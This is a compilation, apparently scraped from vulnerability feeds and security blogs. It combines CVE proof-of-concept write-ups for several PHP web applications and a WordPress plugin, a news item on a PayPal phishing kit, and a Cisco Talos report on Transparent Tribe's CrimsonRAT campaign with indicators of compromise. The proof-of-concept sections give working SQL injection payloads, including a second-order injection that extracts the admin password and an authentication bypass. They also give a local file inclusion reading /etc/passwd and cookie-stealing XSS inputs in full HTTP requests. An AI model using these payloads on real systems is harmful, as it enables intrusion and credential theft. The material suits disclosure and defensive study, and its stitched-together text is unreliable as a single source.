Product Show Room Site v1.0 is vulnerable to SQL Injection via /psrs/?p=products/view_product&id=.

**Product Show Room Site v1.0 by oretnom23 has SQL injection**

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/15370/product-show-room-site-phpoop-free-source-code.html

Vulnerability File: /psrs/?p=products/view\_product&id=

Vulnerability location: /psrs/?p=products/view\_product&id=, id

Current database name: psrs\_db ,length is 7

\[+\] Payload: GET /psrs/?p=products/view\_product&id=1%27%20and%20length(database())%20=7--+ // Leak place ---> id

GET /psrs/?p\=products/view\_product&id\=1%27%20and%20length(database())%20\=7\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=7g6mvmuq5m1o1cvqrhprll4jr1
Connection: close

When length (database ()) = 6, Content-Length: 20014 

When length (database ()) = 7, Content-Length: 21494

CVE-2022-32415: bug_report/SQLi-1.md at main · guydream/bug_report

A local file inclusion (LFI) vulnerability in the component codemirror.php of Portal do Software Publico Brasileiro i3geo v7.0.5 allows attackers to execute arbitrary PHP code via a crafted HTTP request.

Permalink

Cannot retrieve contributors at this time

####################################

\# LFI - Local File Inclusion #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a LFI (Local File Inclusion) in codemirror.php file. The file is located in the "exemplos" folder (/i3geo/exemplos/).

To exploit vulnerability:

\- http://.../i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd

\- http://.../i3geo/exemplos/codemirror.php?&pagina=data://text/plain;base64,SEFDS0VE

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-project-web-security-testing-guide/v42/4-Web\_Application\_Security\_Testing/07-Input\_Validation\_Testing/11.1-Testing\_for\_Local\_File\_Inclusion

####################################

\# XSS or HTML Injection #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a XSS (Cross Site Scripting) or HTML Injection in svg2img.php file. The file is located in the "pacotes" folder (/i3geo/pacotes/).

To exploit vulnerability:

\- http://.../i3geo/pacotes/svg2img.php?w=%3C/script%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-community/attacks/xss/

####################################

\# XSS or HTML Injection #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a XSS (Cross Site Scripting) or HTML Injection in access\_token.php file. The file is located in the "pacotes" folder (/i3geo/pacotes/).

To exploit vulnerability:

\- http://.../i3geo/pacotes/linkedinoauth/example/access\_token.php?=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-community/attacks/xss/

####################################

\# XSS or HTML Injection #

####################################

i3geo - Proof of Concept - Version 6 <= 7.0.5

The vulnerability is a XSS (Cross Site Scripting) or HTML Injection in request\_token.php file. The file is located in the "pacotes" folder (/i3geo/pacotes/).

To exploit vulnerability:

\- http://.../i3geo/pacotes/linkedinoauth/example/request\_token.php?=%22%3E%3Cscript%3Ealert(%22HACKED%22)%3C/script%3E%3C!--

To download i3geo:

\- https://softwarepublico.gov.br/social/i3geo

\- https://github.com/edmarmoretti/i3geo

\- https://github.com/saladesituacao/i3geo

References:

\- https://owasp.org/www-community/attacks/xss/

CVE-2022-32409: ProofOfConcept/i3geo_proof_of_concept.txt at main · wagnerdracha/ProofOfConcept

Attackers use scam security checks to steal victims' government documents, photos, banking information, and email passwords, researchers warn.

Researchers have discovered a new phishing kit that injects malware into legitimate WordPress sites and uses a fake PayPal-branded social engineering scam to trick targets into handing over their most sensitive data, including government documents, photos, and even banking information — under the guise of security controls. 

Akamai researchers said the attackers use a file management WordPress plug-in to deploy the phishing kit, which includes several checks on the connected IP addresses to evade detection of their known malicious domains. It also allows the threat actors to rewrite URLs without the .php at the end, making them look more like genuine addresses. 

Once up and running, the scam PayPal site asks victims to jump through a series of apparent security measures — even a CAPTCHA challenge — when the threat actors are simply grabbing the information for data and identity theft. 

"By using captcha immediately, telling the victim that there has been unusual account activity, and reinforcing 'trust' by utilizing 'new security measures' like proof of government identification, they are making the victim feel as if they are in a legitimate scenario," the Akamai team explains in their new report on the PayPal phishing kit. "The same methods that can ensure an identity is secure can ultimately lead to total identity theft — not just credit card numbers, but cryptocurrency accounts and anything else the threat actor wants to obtain." 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

New Phishing Kit Hijacks WordPress Sites for PayPal Scam

Piwigo v12.2.0 was discovered to contain SQL injection vulnerability via the Search function.

**Second-Order SQL Injection Vulnerabilities in Piwigo 12.2.0**

**Affected Version : <=12.2.0**

A Second-Order SQL injection exists in Piwigo before 12.2.0. An attacker can use the function of search to insert some sql injection payload into the piwigo\_search table and then use the id retrieved to generate an evil URL. When an administrator open the URL, the sql injection will be triggered. An attacker can exploit the vulnerabilities to gain access to the connected MySQL database.

**Steps to Reproduce:**

**Step 1**

Request http://127.0.0.1/qsearch.php?q[test'),((select concat("a:1:{s:1:\"q\";s:41:\"password:",(select mid(password,1,32) from piwigo_users where id%3d1),"\";}")))%23]=1

And then it will be redirected to http://127.0.0.1/index.php?/search/${id}

Record the value of the id.

**Step 2**

Generate the URL http://127.0.0.1/admin.php?page=history&search_id=${id}&user_id=1 (Replace the ${id} into the id that we have gotten last step).

And then send the URL to the administrator.

**Step 3**

After an administrator open the URL above, a piece of data that contains the password of the administrator account will be inserted into the piwigo\_search table. If we want to retrieve the data, we need to know the id of the data that has been inserted into the piwigo\_search table. Because the id is incremental, we can just bruteforce it.

Then we request http://172.20.10.8/index.php?/search/${id} to retrieve the password of the administrator.

CVE-2022-32297: research/Second-Order SQL Injection Vulnerabilities in Piwigo.md at main · sth276/research

Fast Food Ordering System v1.0 was discovered to contain a persistent cross-site scripting (XSS) vulnerability via the component /ffos/classes/Master.php?f=save_category.

    ## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting## Author: Ashish Kumar## Date: 05.31.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software:https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html## Reference:https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6#Description：#The Line 255 of Master.php sends unvalidated data to a web browser, whichcan result in the browser executing malicious code.#echo $Master->save_category();#PoC：POST /ffos/classes/Master.php?f=save_category HTTP/1.1Host: localhostContent-Length: 480sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarySmYVeqOBMhcSziZMX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/ffos/admin/?page=categoriesAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcjConnection: close------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="id"10------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="name"XSS------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="description"Testing XSS "><img src="" onerror="alert(document.cookie)">------WebKitFormBoundarySmYVeqOBMhcSziZMContent-Disposition: form-data; name="status"1------WebKitFormBoundarySmYVeqOBMhcSziZM--

CVE-2022-32318: Fast Food Ordering System 1.0 Cross Site Scripting ≈ Packet Storm

WordPress Kaswara Modern WPBakery Page Builder plugin versions 3.0.1 and below suffer from an arbitrary file upload vulnerability.

    Description: Arbitrary File Upload/Deletion and OtherAffected Plugin: Kaswara Modern WPBakery Page Builder AddonsPlugin Slug: kaswaraAffected Versions: <= 3.0.1CVE ID: CVE-2021-24284CVSS Score: 10.0 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:HFully Patched Version: NO AVAILABLE PATCH.The majority of the attacks we have seen are sending a POST request to /wp-admin/admin-ajax.php using the uploadFontIcon AJAX action found in the plugin to upload a file to the impacted website. Your logs may show the following query string on these events:/wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1We have observed 10,215 attacking IP addresses, with the vast majority of exploit attempts coming from these top ten IPs:- 217.160.48.108 with 1,591,765 exploit attempts blocked- 5.9.9.29 with 898,248 exploit attempts blocked- 2.58.149.35 with 390,815 exploit attempts blocked- 20.94.76.10 with 276,006 exploit attempts blocked- 20.206.76.37 with 212,766 exploit attempts blocked- 20.219.35.125 with 187,470 exploit attempts blocked- 20.223.152.221 with 102,658 exploit attempts blocked- 5.39.15.163 with 62,376 exploit attempts blocked- 194.87.84.195 with 32,890 exploit attempts blocked- 194.87.84.193 with 31,329 exploit attempts blockedtotal exploit attempts (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVBShv6GLdzPVD2tfx2nL3-mW1vWpFD4Ms7XyN7RflyV3kWF_V1-WJV7CgVwTW2HR3PZ2kBMBfW2t6xdk5Ml1S9W5bCZ525-mJqWW40tw862L5dGgW3Y11hW3lq3yLW7y3VmP4FS25GW5F4n688Q7Md-W7h1qvn5WjbzdDFPF5rn3yqW3GxZMh3tKpFmW97_3MJ3QxrZsW4G865d4YQk8NW4L97Qj65XkLvW4lVm1J6zK1PHN4PpGwFcdg7nW5KZv7G1P1n1wW2xsSjJ8lVXZJW6-vVB14dqX31W51ts4M1f3sHMN3WTKGV7R0VmW3BkkKd7HcTHcW3Mgljb1Lw63wW7_lfQF8d1jK9W2STHKk85KKhwW29fhqS6Z-kR3W7CZrhd3CR-ZvW3N9v9p8j3s_9W4dwzb85pW5-f3fY-1 )Indicators of CompromiseBased on our analysis of the attack data, a majority of attackers are attempting to upload a zip file named a57bze8931.zip. When attackers are successful at uploading the zip file, a single file named a57bze8931.php will be extracted into the /wp-content/uploads/kaswara/icons/ directory. The malicious file has an MD5 hash of d03c3095e33c7fe75acb8cddca230650. This file is an uploader under the control of the attacker. With this file, a malicious actor has the ability to continue uploading files to the compromised website.The indicators observed in these attacks also include signs of the NDSW trojan, which injects code into otherwise legitimate JavaScript files and redirects site visitors to malicious websites. The presence of  this string in your JavaScript files is a strong indication that your site has been infected with NDSW:;if(ndsw==Some additional filenames that attackers are attempting to upload includes:- [xxx]_young.zip where [xxx] varies and typically consists of 3 characters like ‘svv_young’- inject.zip- king_zip.zip- null.zip- plugin.zipWhat Should I Do If I Use This Plugin?All Wordfence users, including Free, Premium, Care, and Response, are protected from exploits targeting this vulnerability. However, at this time the plugin has been closed, and the developer has not been responsive regarding a patch. The best option is to fully remove the Kaswara Modern WPBakery Page Builder Addons plugin from your WordPress website.If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected, as this is a serious vulnerability that can lead to complete site takeover.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

WordPress Kaswara Modern WPBakery Page Builder 3.0.1 File Upload

A vulnerability classified as problematic was found in SourceCodester Simple e-Learning System 1.0. Affected by this vulnerability is an unknown functionality of the file /vcs/claire_blake. The manipulation of the argument Bio with the input "><script>alert(document.cookie)</script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

An attacker could steal cookies with a crafted URL sent to the victims.

    POST /vcs/claire_blake HTTP/1.1
    Host: localhost
    Content-Length: 143
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/vcs/claire_blake
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=2vbf8fv8l1iaabtd45grgqt809
    Connection: close
    
    firstName=Claire&lastName=Blake&phoneNumber=2147483647&bio=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&profile-updateBtn=Update

CVE-2022-2396: CVE/POC.md at 83c243538386cd0761025f85eb747eab7cae5c21 · CyberThoth/CVE

A vulnerability was found in LogoStore. It has been classified as critical. Affected is an unknown function of the file /LogoStore/search.php. The manipulation of the argument query with the input test' UNION ALL SELECT CONCAT(CONCAT('qqkkq','VnPVWVaYxljWqGpLLbEIyPIHBjjjjASQTnaqfKaV'),'qvvpq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oCrh&search= leads to sql injection. It is possible to launch the attack remotely.

CVE-2017-20129

Cisco Talos has been tracking a new malicious campaign operated by the Transparent Tribe APT group.This campaign involves the targeting of educational institutions and students in the Indian subcontinent, a deviation from the adversary's typical focus on government entities.The attacks result in...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

*   Cisco Talos has been tracking a new malicious campaign operated by the Transparent Tribe APT group.
*   This campaign involves the targeting of educational institutions and students in the Indian subcontinent, a deviation from the adversary's typical focus on government entities.
*   The attacks result in the deployment of CrimsonRAT, Transparent Tribe's malware of choice for establishing long-term access into victim networks.
*   We assess with high confidence that a Pakistani web hosting services provider "Zain Hosting" was used for deploying and operating components of Transparent Tribe's infrastructure. This is likely one of many third parties Transparent Tribe employs to prepare, stage and/or deploy components of their operation.

**Overview**

Cisco Talos recently discovered an ongoing campaign conducted by the Transparent Tribe APT group against students at various educational institutions in India. This campaign was partially covered by another security firm, but our findings reveal more details regarding the adversary's operations.

Typically, this APT group focuses on targeting government (government employees, military personnel) and pseudo-government entities (think tanks, conferences, etc.) using remote access trojans (RATs) such as CrimsonRAT and ObliqueRAT. However, in this new campaign dating back to December 2021, the adversary is targeting students of universities and colleges in India. This new campaign also suggests that the APT is actively expanding its network of victims to include civilian users.

We also assess with high confidence that a Pakistani web hosting services provider, "ZainHosting" was employed by the APT for deploying and operating parts of Transparent Tribe's infrastructure used in this campaign.

**Threat actor profile**

Transparent Tribe is a suspected Pakistan-linked threat actor. This group typically targets individuals and entities associated with governments and military personnel in the Indian subcontinent, specifically Afghanistan and India. Transparent Tribe has also been known to use their CrimsonRAT implant against human rights activists in Pakistan.

The group primarily uses three Windows-based malware families to carry out espionage activities against their targets.

*   CrimsonRAT is a .NET-based implant that is the group's malware of choice since at least 2020. Transparent Tribe's multiple campaigns leveraging CrimsonRAT over the years indicate a steady evolution in the implant's capabilities.
*   ObliqueRAT is a C/C++-based implant discovered by Talos in early 2020. ObliqueRAT is primarily reserved for hyper-targeted attacks on government personnel and in operations where stealth is a prime focus of the attackers' infection chain. This implant has also seen a constant evolution in deployment tactics and malicious functionalities over time.
*   Custom malware used by Transparent Tribe consists of easily and quickly deployable downloaders, droppers and lightweight RATs containing limited capabilities as opposed to CrimsonRAT and ObliqueRAT.

Transparent Tribe also maintains a suite of mobile implants in their arsenal. Implants such as CapraRAT are constantly modified to be deployed against targets. These implants contain a plethora of malicious capabilities meant to steal data from mobile devices.

**Attack details: Infection chain**

The attack consists of a maldoc delivered to the target as an attachment or a link to a remote location via a spear-phishing email. The maldocs consist of malicious VBA macros commonly observed in previous Transparent Tribe campaigns. The macros extract an embedded archive file from the maldoc and unzip it to execute a copy of the malware in the archive file. The malware in the archive files is CrimsonRAT.

Malicious macro dropping embedded zip to disk.

  
**CrimsonRAT**

The CrimsonRAT payloads deployed in this campaign are very similar to those from past Transparent Tribe campaigns. It is the staple implant of choice for Transparent Tribe to establish long-term access into victim networks. This RAT is actively updated, adding new capabilities and obfuscating the implant.

The latest version of CrimsonRAT seen in this campaign contains a number of capabilities, including:

*   List files and folders in a directory path specified by the command and control (C2).
*   Run specific processes on the endpoint, such as keylogger and USB modules.
*   List process IDs and names running on the endpoint.
*   Get information, such as name, creation times and size of image files (pictures such as BMP, JPG, etc.) specified by the C2.
*   Take screenshots of the current screen and send them to the C2.
*   Upload keylogger logs from a file on disk to the C2.
*   Send system information to the C2, including:

*   Computer name, username, operating system name, the file path of implant and parent folder path.
*   Indicator of whether the keylogger module is in the endpoint and running and its version.
*   Indicator of whether the USB module is in the endpoint and running and its version.

*   Run arbitrary commands on the system.
*   Write data sent by the C2 to a file on disk.
*   Read contents of a file on disk and exfiltrate to the C2.
*   List all drives on the system.
*   List all files in a directory.
*   Download the USB worm and keylogger modules from the C2 and write them to disk.
*   Send a file's name, creation time and size to the C2- file path as specified by the C2.
*   Delete files specified by the C2 from the endpoint.
*   Get names, creation times and size of all files containing the file extension specified by the C2.

**Infrastructure and attribution**  
**Campaign Infrastructure**

A number of these maldocs and archives containing these maldocs were hosted on the domains registered by the attackers, with the earliest domain registered in June 2021. These domains were named so that they would appear relevant to students and educational entities in India. Some examples of domains registered by the threat actor are:

*   studentsportal\[.\]live
*   studentsportal\[.\]website
*   studentsportal\[.\]co

However, we've also discovered the use of additional media-themed domains that the attackers are preparing to use in parallel campaigns against their targets. These domains are in line with Transparent Tribe's tactic of using malicious file-sharing domains we've observed in previous attacks and campaigns.

*   cloud-drive\[.\]store
*   user-onedrive\[.\]live
*   drive-phone\[.\]online

During the course of our research, we discovered SSL certificate overlaps with another domain registered by the attackers in June 2021, geo-news\[.\]tv, using the email address immikhan034\[@\]gmail\[.\]com. This domain is a typo-squatted version of geo\[.\]tv, a legitimate Pakistani news website. Subdomains on the malicious typo-squatted domains include those that hosted SSL certificates for the student and media-themed malicious domains:

*   cloud-drive.geo-news.tv
*   drive-phone.geo-news.tv
*   studentsportal.geo-news.tv
*   user-onedrive.geo-news.tv

All the malicious domains have recently resolved to the same IP address: 198\[.\]37\[.\]123\[.\]126. This strongly suggests shared infrastructure among all the malicious domains.

SSL certificate for geo-news\[.\]tv.

  
**Honeytraps**

Many of the domains registered by the attackers for this campaign consisted of rudimentary websites with front pages containing embedded Google Drive folders. All of these folders contained pictures of women. It is highly likely that these front pages will be used as stagers for honeytrap-based attacks in the future, another tactic typical of the Transparent Tribe APT.

Google Drive folder embedded in the fake website operated by Transparent Tribe.

  
**Infrastructure attribution**

The DNS SOA records for all the malicious domains utilized in this APT campaign contain a common administrator email address: **rupees001\[at\]gmail\[.\]com**. This email address has been used to register and administer approximately 2,000 legitimate and malicious domains. However, there are a couple of domains in this list that stand out:

*   zainhosting\[.\]net
*   vebhost\[.\]com

Of the two domains, vebhost\[.\]com hosts a dummy website that advertises website-building services. The malicious domains used in this campaign, such as studentsportal\[.\]live and others, use vebhost\[.\]com name servers, specifically:

*   ns1\[.\]vebhost\[.\]com
*   ns2\[.\]vebhost\[.\]com

Therefore, it is highly likely that the operators registering and maintaining the malicious domains also operate web-hosting services through vebhost\[.\]com.

The second domain, zainhosting\[.\]net belongs to a seemingly legitimate web services and hosting provider called "Zain Hosting" based out of Lahore, Pakistan.

Apart from zainhosting\[.\]net, the hosting provider also operates zainhosting\[.\]com, which is this business' primary front for their legitimate operations. Interestingly, vebhost\[.\]com uses zainhosting\[.\]com's name servers:

*   ns5.zainhosting.com
*   ns6.zainhosting.com

ZainHosting advertises their services heavily on Facebook and has been active since at least 2010. Their webpage from 2010 listed rupees001\[at\]gmail\[.\]com as a contact address for the business. This email has since been used to register, renew and administer several malicious web pages over time, _including the malicious domains used by the Transparent Tribe APT in their most recent campaign_.

  

ZainHosting webpage from 2010 listing rupees001\[at\]gmail\[.\]com as a contact address.

All three sets of domains -- the malicious Transparent Tribe infrastructure, vebhost\[.\]com and zainhosting\[.\]net/com -- are clearly related, with "ZainHosting"' owning and operating the malicious infrastructure. However, the entire scope of ZainHosting's role in the Transparent Tribe organization is still unknown. We believe with high confidence that ZainHosting is just one of the many infrastructure contractors hired by Transparent Tribe. Such contractors might be hired to simply prepare and stage the APT's infrastructure and possibly be given packages (archives, etc.) containing malicious artifacts to deploy, that are then distributed by the APT operators themselves to targets of interest.

**Conclusion**

Transparent Tribe has been aggressively trying to widen its net of victims in the Indian subcontinent. Their operations started as early as at least 2016 and have largely focussed on infecting government and military officials in Afghanistan and India. Over the past few years, we saw the APT begin targeting pseudo-government entities and individuals belonging to think tanks and defense contractors.

However, their new campaign indicates that the threat actors' strategy is evolving to target civilian personnel, specifically those connected to educational institutions. This might be in accordance with their nation-state's goal to establish long-term access and steal valuable and restricted research from premier research institutions associated with the Indian government. Keeping tabs on an adversary nation's research endeavors is a strategic goal adopted by many APT groups observed across the world.

Organizations must be diligent against such highly motivated adversaries that are rapidly evolving their strategies and expanding their network of targets. In-depth defense strategies based on a risk analysis approach can deliver the best results in the prevention. However, this should always be complemented by a good incident response plan which has been not only tested with tabletop exercises and reviewed and improved every time it's put to the test on real engagements.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**Orbital Queries**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

**IOCs**

IOCs for this research can also be found at our Github repository here.

  
**Maldocs**

bdeb9d019a02eb49c21f7c04169406ac586d630032a059f63c497951303b8d00  
388f212dfca2bfb5db0a8b9958a43da6860298cdd4fcd53ed2c75e3b059ee622  
0d61d5fe8dbf69c6e61771451212fc8e587d93246bd866adf1031147d6d4f8c2  
14ee2e3a9263bab359bc19050567d0dbd6371c8c0a7c6aeba71adbf5df2fc35b

**Archives**

8c1a5052bf3c1b33aff9e249ae860ea1435ce716d5b5be2ec3407520507c6d37  
79aee357ea68d8f66b929ba2e57465eaee4d965b0da5001fe589afe1588874e3

**CrimsonRAT**

8b786784c172c6f8b241b1286a2054294e8dc2c167d9b4daae0e310a1d923ba0  
b4819738a277090405f0b5bbcb31d5dd3115f7026401e5231df727da0443332a  
e2cf71c78d198fdc0017b7bfd6ce8115301174302b3eaaf50cfc384db96bc573  
8c9b0fd259e7f016f53be8edc53fe5f908b48ae691e21f0f820da11429e595d8  
f3a1ac021941b481ac7e2335b74ebf1e44728e8917381728f1f5b390c6f34706  
fc34f9087ab199d0bac22aa97de48e5592dbf0784342b9ecd01b4a429272ab5b  
b3f8e026f39056ec5e66700e03eeaf57454ee9c0bc1c719d74e10f5702957305  
9159d4e354218870461c96bedcc7b5b026f872d30235bb4536cc4a5ce4154725  
b614436bf9461b80384bae937d699f8c3886bcc65b907e0c8126b4df59ea8cdb  
28390e3ea8a547f05ca08551f484292d46398a2b38fd4aae001ac7d056c5abc0

**IPs**

192\[.\]3\[.\]99\[.\]68  
198\[.\]37\[.\]123\[.\]126

**Domains**

studentsportal\[.\]live  
geo-news\[.\]tv  
cloud-drive\[.\]store  
user-onedrive\[.\]live  
drive-phone\[.\]online  
studentsportal\[.\]co  
studentsportal\[.\]website  
nsdrive-phone\[.\]online  
statefinancebank\[.\]com  
in\[.\]statefinancebank\[.\]com  
centralink\[.\]online  
cloud-drive\[.\]geo-news\[.\]tv  
drive-phone\[.\]geo-news\[.\]tv  
studentsportal\[.\]geo-news\[.\]tv  
user-onedrive\[.\]geo-news\[.\]tv  
studentsportal\[.\]live\[.\]geo-news\[.\]tv  
phone-drive\[.\]online\[.\]geo-news\[.\]tv  
sunnyleone\[.\]hopto\[.\]org  
swissaccount\[.\]ddns\[.\]net

**URLs**

hxxps\[://\]studentsportal\[.\]live/download\[.\]php?file=Mental\_Health\_Survey\[.\]docm  
hxxps\[://\]studentsportal\[.\]website/download\[.\]php?file=5-mar\[.\]zip

Transparent Tribe begins targeting education sector in latest campaign

A vulnerability was found in KB Affiliate Referral Script 1.0. It has been classified as critical. This affects an unknown part of the file /index.php. The manipulation of the argument username/password with the input 'or''=' leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.

    # # # # # 
    # Exploit Title: KB Affiliate Referral PHP Script V1.0 - Authentication Bypass
    # Google Dork: N/A
    # Date: 26.01.2017
    # Vendor Homepage: http://kunals.com/
    # Software Download: http://phpscripts.kunals.com/d/item/files/kbaffiliate.rar
    # Demo: http://phpscripts.kunals.com/d/item/detail/affiliate/demo/
    # Version: 1.0
    # Tested on: Win7 x64, Kali Linux x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[beygir]ihsan[nokta]net
    # # # # #
    # Exploit :
    # http://localhost/[PATH]/index.php?page=act/login and set Username and Password to 'or''=' and hit enter.
    # # # # #

Tag

#php